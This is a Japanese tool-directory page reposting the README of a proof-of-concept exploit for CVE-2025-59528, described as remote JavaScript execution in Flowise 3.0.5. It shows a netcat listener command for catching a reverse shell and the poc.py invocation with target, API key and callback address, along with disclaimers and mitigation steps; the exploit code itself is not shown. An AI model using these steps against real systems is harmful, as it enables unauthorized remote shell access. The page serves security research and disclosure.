Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-59528-PoC — The poc of CVE-2025-59528 | Kitploit
ツール/GitHubGitHub/sonnelon/cve-2025-59528-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsonnelon/cve-2025-59528-poc

CVE-2025-59528-PoC

The poc of CVE-2025-59528

リポジトリを見る
11日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-59528 PoC

隔離された実験室環境で CVE-2025-59528 を調査するための Proof of Concept です。

[!WARNING] 免責事項

このプロジェクトは、教育目的、セキュリティ研究、および自分が所有する、または明示的な許可を得てテストするシステムのテスト にのみ使用することを意図しています。

この PoC を、所有者の許可なく第三者サーバー、公開サービス、またはインフラストラクチャに対して使用しないでください。

作者は、このプロジェクトの誤用によって生じたいかなる損害、データ損失、サービス停止、または法的結果についても責任を負いません。

説明

この PoC は、Flowise におけるユーザー制御の mcpServerConfig の処理に関連する脆弱性である CVE-2025-59528 の潜在的な影響を示します。

特定の条件下では、この脆弱性により、攻撃者がサーバーサイドのコンテキストで任意の JavaScript コードを実行できる可能性があります。

影響を受けるバージョン

  • Flowise 3.0.5

修正済みバージョン

  • Flowise 3.0.6+

テスト前に、対象インストールの正確なバージョンを必ず確認してください。

要件

  • Python 3
  • requests
  • ローカルまたは隔離された Flowise テストインスタンス
  • 必要な権限を持つ承認済みアカウント

Python の依存関係をインストールします:

root@kitploit:~
pip install requests

使い方

シェルを取得するために netcat を実行します:

root@kitploit:~
nc -lvnp <YOUR_PORT>

PoC を次のように実行します:

root@kitploit:~
python3 poc.py \
    -t http://TARGET:PORT \
    -o api_key \
    -i CALLBACK_IP \
    -p CALLBACK_PORT

引数

実験室環境のセットアップ

テストは、隔離された仮想ネットワークまたは実験室ネットワーク内で実施する必要があります。

root@kitploit:~
┌──────────────────┐
│    PoC Machine   │
│                  │
│    Python PoC    │
└────────┬─────────┘
         │
         │ Isolated Network
         │
┌────────▼─────────┐
│   Flowise 3.0.5  │
│   Test Instance  │
└──────────────────┘

意図的に脆弱性のある Flowise インスタンスを、インターネットに直接公開しないでください。

緩和策

影響を受けるバージョンの Flowise を実行している場合:

  1. Flowise をパッチ適用済みバージョンにアップグレードします。
  2. 管理 API へのアクセスを制限します。
  3. 信頼できないユーザーに、脆弱な機能へアクセスするために必要な権限を付与しないようにします。
  4. サーバーログで不審なリクエストを確認します。
  5. アップグレード後にインストールを再テストします。

参照

  • CVE: CVE-2025-59528
  • 影響を受けるソフトウェア: Flowise
  • 修正済みバージョン: 3.0.6+

法的通知

このプロジェクトを使用することにより、利用者は適用されるすべての法律および規制を遵守する単独の責任を負うことを承認したものとみなされます。

この PoC は、自分が所有するシステム、またはセキュリティテストの実施について明示的な許可を得たシステムに対してのみ使用してください。

ツールをダウンロード
ArgumentDescription
-t, --targetFlowise テストインスタンスの URL
-o, --api_keyAPI キー
-i, --ipテストマシンの IP アドレス
-p, --portテスト環境で使用するポート